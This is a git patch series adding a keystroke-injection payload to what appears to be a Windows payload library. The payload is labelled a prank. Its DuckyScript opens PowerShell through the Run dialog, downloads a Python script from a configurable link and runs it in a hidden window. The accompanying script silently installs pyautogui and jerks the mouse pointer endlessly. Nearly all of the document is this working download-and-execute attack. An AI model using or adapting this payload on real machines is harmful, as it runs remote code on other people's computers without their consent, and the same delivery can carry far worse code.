From 603015460d2f8f0841ed20771c955afc0a1c499c Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 14:25:06 +0200 Subject: [PATCH 1/3] The Mouse Moves By Itself --- .../The_Mouse_Moves_By_Itself/payload.txt | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt new file mode 100644 index 0000000..9abbe92 --- /dev/null +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt @@ -0,0 +1,35 @@ +REM ############################################ +REM # | +REM # Title : The Mouse Moves By Itself | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Prank | +REM # Target : Windows 10/11 | +REM # | +REM ############################################ + + +REM Requirements: +REM - Internet Connection + + +REM REQUIRED - Set your Python script link +DEFINE SCRIPT-PY-LINK example.com + + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +ENTER +DELAY 500 + +STRING Invoke-WebRequest -Uri " +STRING SCRIPT-PY-LINK +STRING " -OutFile "script.py" +ENTER +DELAY 500 + +STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden +DELAY 1000 +ALT F4 From f5495ea263c6247903921028ef2b3d64683463ac Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 14:25:50 +0200 Subject: [PATCH 2/3] script --- .../prank/The_Mouse_Moves_By_Itself/README.md | 21 +++++++++++++++++++ .../prank/The_Mouse_Moves_By_Itself/script.py | 15 +++++++++++++ 2 files changed, 36 insertions(+) create mode 100644 payloads/library/prank/The_Mouse_Moves_By_Itself/README.md create mode 100644 payloads/library/prank/The_Mouse_Moves_By_Itself/script.py diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md b/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md new file mode 100644 index 0000000..87f400e --- /dev/null +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md @@ -0,0 +1,21 @@ +# The Mouse Moves By Itself + +A script used to prank your friends with the mouse pointer. + +**Category**: Prank + +## Description + +A script used to prank your friends with the mouse pointer. + +Opens a shell, dowloand the Python script that will prank your friends mouving the mouse pointer. + +## Getting Started + +### Dependencies + +* Internet Connection + +### Settings + +- Setup your Python script link in the payload.txt file diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/script.py b/payloads/library/prank/The_Mouse_Moves_By_Itself/script.py new file mode 100644 index 0000000..8443309 --- /dev/null +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/script.py @@ -0,0 +1,15 @@ +import os +try: + import pyautogui +except: + os.system("pip install pyautogui") + import pyautogui +import random +import time + +while True: + # Move the mouse cursor randomly + x_offset = random.randint(-250, 250) + y_offset = random.randint(-250, 250) + pyautogui.moveRel(x_offset, y_offset, duration=0.25) + time.sleep(0.1) # 1 second delay From bfee640a04696e577d4fc261135286bce6d589cb Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 14:08:00 -0400 Subject: [PATCH 3/3] Update payload.txt --- .../prank/The_Mouse_Moves_By_Itself/payload.txt | 16 ++++------------ 1 file changed, 4 insertions(+), 12 deletions(-) diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt index 9abbe92..86fe737 100644 --- a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt @@ -14,22 +14,14 @@ REM - Internet Connection REM REQUIRED - Set your Python script link -DEFINE SCRIPT-PY-LINK example.com +DEFINE #SCRIPT-PY-LINK example.com +DEFAULT_DELAY 500 -DELAY 1000 GUI r -DELAY 500 -STRING powershell -ENTER -DELAY 500 +STRINGLN powershell -STRING Invoke-WebRequest -Uri " -STRING SCRIPT-PY-LINK -STRING " -OutFile "script.py" -ENTER -DELAY 500 +STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py" STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden -DELAY 1000 ALT F4